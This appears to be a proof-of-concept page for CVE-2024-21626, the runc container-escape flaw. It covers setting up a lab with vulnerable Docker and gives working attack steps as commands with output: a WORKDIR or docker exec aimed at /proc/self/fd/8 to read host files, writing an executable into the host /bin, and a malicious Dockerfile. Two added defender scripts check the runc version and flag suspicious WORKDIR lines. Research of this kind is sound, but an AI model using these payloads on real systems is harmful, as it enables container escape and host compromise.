## https://sploitus.com/exploit?id=17F0090F-89AC-5757-A39B-45005DECDB39
# PoC of CVE-2024-21626
Read my full article for detailed explanation [here](https://sk3pper.github.io/posts/cve-2024-21626/playing-with-cve-2024-21626/).
## Set up the environment
#### A. Download and install Ubuntu 22.04.1 LTS
During the installation, do not tick the box that downloads updates while installing.
#### B. Install the Guest Additions CD image to work comfortably with the virtual machine
- insert the Guest Additions CD image
- open a terminal in the mounted CD image
- run the VBoxLinuxAdditions.run script
```shell
demo@demo-pc:/media/demo/VBox_GAs_7.0.14$ sudo ./VBoxLinuxAdditions.run
```
#### C. Install the vulnerable docker version and related components
- Set up Docker's apt repository
```shell
# set up Docker's apt repository: add Docker's official GPG key:
sudo apt update
sudo apt install ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
# add the repository to Apt sources:
echo \
"deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \
$(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
```
- Find and install the right version of the different components (docker-ce, docker-ce-cli, containerd.io, docker-buildx-plugin).
```shell
# search the apt cache for the available docker-ce packages
apt-cache madison docker-ce | awk '{ print $3 }'
# set the chosen version
VERSION_STRING=5:24.0.6-1~ubuntu.22.04~jammy
# search the apt cache for the available containerd.io and docker-buildx-plugin packages
apt-cache madison containerd.io | awk '{ print $3 }'
apt-cache madison docker-buildx-plugin | awk '{ print $3 }'
# install the packages
sudo apt install docker-ce=$VERSION_STRING \
docker-ce-cli=$VERSION_STRING \
containerd.io=1.6.4-1 \
docker-buildx-plugin=0.10.2-1~ubuntu.22.04~jammy
```
If the packages are too old to appear in the repository index (check the old repository online as well), or if you cannot use Docker's apt repository at all, download the deb files for your release and install them manually.
Get them from https://download.docker.com/linux/ubuntu/dists/ or use the deb files included in my GitHub repository, then install them.
```shell
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git
# install deb files
cd CVE-2024-21626/deb
sudo dpkg -i ./containerd.io_1.6.4-1_amd64.deb \
./docker-ce_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-ce-cli_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-buildx-plugin_0.10.2-1~ubuntu.22.04~jammy_amd64.deb
```
#### D. Check the installed versions
```shell
sudo docker version
runc --version
containerd --version
uname -r
```
#### E. Check if the kernel is vulnerable
The exploit relies on the openat2 syscall being available on the host kernel. Check manually with the following command:
```shell
grep openat2 /proc/kallsyms
```
Where that check is not conclusive, the Go program in my GitHub repository tests whether the openat2 syscall is present.
```shell
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git
# run testOpenat2
cd CVE-2024-21626/testOpenat2
./testOpenat2
The unix.Openat2 syscall is present on this system.
```
The binary in the repository was built with the following command:
```shell
env GOOS=linux GOARCH=amd64 go build testOpenat2.go
```
## Verify if the target is vulnerable
Run checkVulnerability.sh and check whether the file is printed to the terminal.
```shell
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git
# run checkVulnerability.sh
cd CVE-2024-21626
chmod +x checkVulnerability.sh
./checkVulnerability.sh
```
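As an added defender-side check (not part of the repository or of checkVulnerability.sh), the function below parses the output of `runc --version` and reports whether the installed runc predates 1.1.12, the release that fixed CVE-2024-21626. The sample outputs are constructed; the version-comparison logic is the only assumption made here.

```shell
#!/bin/sh
# Added example (not from the Sk3pper/CVE-2024-21626 repository): compare the
# runc version reported by `runc --version` against 1.1.12, the fixed release.

# runc_version_from_output OUTPUT: extract "X.Y.Z" from the first line of
# `runc --version`, e.g. "runc version 1.1.9" -> "1.1.9", "1.1.12+dev" -> "1.1.12".
runc_version_from_output() {
    printf '%s\n' "$1" | sed -n 's/^runc version \([0-9][0-9.]*\).*$/\1/p' | head -n 1
}

# version_lt A B: exit 0 when dotted version A sorts strictly before B,
# comparing each component numerically (so 1.1.10 is newer than 1.1.9).
version_lt() {
    [ "$1" = "$2" ] && return 1
    first=$(printf '%s\n%s\n' "$1" "$2" | sort -t . -k1,1n -k2,2n -k3,3n | head -n 1)
    [ "$first" = "$1" ]
}

# runc_is_vulnerable OUTPUT: exit 0 when the reported runc predates the fix,
# 1 when it is 1.1.12 or newer, 2 when no version could be parsed.
runc_is_vulnerable() {
    v=$(runc_version_from_output "$1")
    [ -n "$v" ] || return 2
    version_lt "$v" "1.1.12"
}

# Constructed sample outputs (not captured from a real host).
SAMPLE_OLD='runc version 1.1.9
spec: 1.0.2-dev'
SAMPLE_FIXED='runc version 1.1.12
spec: 1.0.2-dev'

# Live check when runc is installed on this host.
if command -v runc >/dev/null 2>&1; then
    out=$(runc --version 2>/dev/null)
    if runc_is_vulnerable "$out"; then
        echo "runc $(runc_version_from_output "$out") predates 1.1.12: update runc"
    fi
fi
```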
## Attack 1
Exploit by setting the working directory to `/proc/self/fd/`
```shell
# run container with working directory to /proc/self/fd/8
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
# read host filesystem files inside the container
root@c4c0a9c99be6:.# cat ../../../../../../../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc
```
![exploit via running a container](./images/attack1.png)
## Attack 2
Exploit via `docker exec`.
Open a terminal and run the following commands
```shell
# terminal 1
# run container
demo@demo-pc:~$ sudo docker run --name cve-2024-21626 --rm -it debian:bookworm
# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /bar
```
Open a second terminal and run the following command
```shell
# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 120
```
Go back to the first terminal and access the host filesystem
```shell
# terminal 1: find the actual pid with the right cmdline
root@d98de5a852d7:/# ls -f /proc
. irq kmsg kcore mdstat cpuinfo sysvipc softirqs bootconfig execdomains sysrq-trigger 15
.. net misc locks mounts devices version zoneinfo interrupts filesystems version_signature
fb sys mtrr swaps uptime ioports consoles buddyinfo kpagecount kpagecgroup self
fs tty scsi asound vmstat loadavg kallsyms diskstats kpageflags vmallocinfo thread-self
bus acpi stat crypto cgroups meminfo pressure key-users partitions pagetypeinfo 1
dma keys iomem driver cmdline modules slabinfo schedstat timer_list dynamic_debug 9
root@d98de5a852d7:/# cat /proc/9/cmdline
sleep120
# read host filesystem files
root@d98de5a852d7:/# cat /proc/9/cwd/../../../../../../../../../etc/hostname
demo-pc
# read container filesystem files
root@d98de5a852d7:/# cat /etc/hostname
d98de5a852d7
```
![Exploit via execing into a running container](./images/attack2.png)
## Attack 3a
```shell
# Attack 3a is attack 1 adapted to overwrite a host binary
# run container with the working directory set to /proc/self/fd/8
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@e5b0730af51d:.#
# write a file on the host
root@b6873018a7e8:.# cat > ../../../../../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF
# make it executable
root@b6873018a7e8:.# ../../../../../bin/chmod +x ../../../../bin/cve2024_21626
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
# check if the file is present in the host
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x 1 root root 40 mar 7 13:24 cve2024_21626
# try it in the host
demo@demo-pc:/bin$ sudo ./cve2024_21626
Hello CVE-2024-21626
```
![Exploit via running a container and writing a host binary](./images/attack3a.png)
## Attack 3b
```shell
# scenario 3b: host binary overwrite
# Attack 3b is attack 2 adapted to overwrite a host binary
# terminal 1
# run container
sudo docker run --name cve-2024-21626 --rm -it debian:bookworm
# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /bar
# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 1000
# terminal 1
# find the actual pid with the right cmdline
root@d98de5a852d7:/# ls -f /proc
. irq kmsg kcore mdstat cpuinfo sysvipc softirqs bootconfig execdomains sysrq-trigger 15
.. net misc locks mounts devices version zoneinfo interrupts filesystems version_signature
fb sys mtrr swaps uptime ioports consoles buddyinfo kpagecount kpagecgroup self
fs tty scsi asound vmstat loadavg kallsyms diskstats kpageflags vmallocinfo thread-self
bus acpi stat crypto cgroups meminfo pressure key-users partitions pagetypeinfo 1
dma keys iomem driver cmdline modules slabinfo schedstat timer_list dynamic_debug 9
root@d98de5a852d7:/# cat /proc/9/cmdline
sleep120
# write a file on the host
root@b6873018a7e8:.# cat > /proc/8/cwd/../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF
# make it executable
root@b6873018a7e8:.# /proc/8/cwd/../../../../bin/chmod +x \
/proc/8/cwd/../../../../bin/cve2024_21626
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
# check if the file is present in the host
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x 1 root root 40 mar 7 13:39 cve2024_21626
# try it in the host
demo@demo-pc:/bin$ sudo ./cve2024_21626
Hello CVE-2024-21626
```
## Attack with a malicious image :whale:
Given the following Dockerfile
```Dockerfile
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
WORKDIR /proc/self/fd/8
```
Build and run the image
```shell
sudo docker build . -t devil-image
sudo docker run -it --rm devil-image bash
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@415a2e1f079f:.# cat ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc
```
![Exploit via malicious image](./images/attack4.png)
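As an added defender-side example (not from the repository), the script below scans a Dockerfile for WORKDIR instructions that point into `/proc/<pid>/fd`, the pattern the image above relies on. The sample Dockerfile is constructed; the symlink indirection of Attack 2 (`-w /bar`) only resolves at runtime and cannot be caught this way, so this complements, rather than replaces, updating runc.

```shell
#!/bin/sh
# Added example (not from the Sk3pper/CVE-2024-21626 repository): flag Dockerfile
# WORKDIR lines that target /proc/<pid>/fd, as in the devil-image above.
# A symlink created at runtime (Attack 2) is invisible to this static check.

# is_proc_fd_path PATH: exit 0 when PATH points lexically into /proc/<pid>/fd.
# Repeated and trailing slashes are collapsed before matching.
is_proc_fd_path() {
    p=$(printf '%s' "$1" | sed 's#//*#/#g; s#/$##')
    printf '%s\n' "$p" | grep -Eq '^/proc/(self|thread-self|[0-9]+)/fd(/|$)'
}

# scan_dockerfile: read a Dockerfile on stdin and print "LINENO: <instruction>"
# for every WORKDIR whose target matches; exit 0 when nothing matched, else 1.
scan_dockerfile() {
    hits=0
    n=0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        trimmed=$(printf '%s' "$line" | sed 's/^[[:space:]]*//')
        case "$trimmed" in
            [Ww][Oo][Rr][Kk][Dd][Ii][Rr]*) ;;
            *) continue ;;
        esac
        target=$(printf '%s' "$trimmed" | sed 's/^[Ww][Oo][Rr][Kk][Dd][Ii][Rr][[:space:]]*//; s/[[:space:]]*$//')
        if is_proc_fd_path "$target"; then
            echo "$n: $trimmed"
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -eq 0 ]
}

# Constructed Dockerfile mirroring the devil-image, plus benign and odd-case lines.
SAMPLE_DOCKERFILE='FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
WORKDIR /app
WORKDIR /proc/self/fd/8
  workdir /proc/1234/fd/'
```

Pipe a real Dockerfile into `scan_dockerfile` (for example `scan_dockerfile < Dockerfile`) to use it outside the constructed sample.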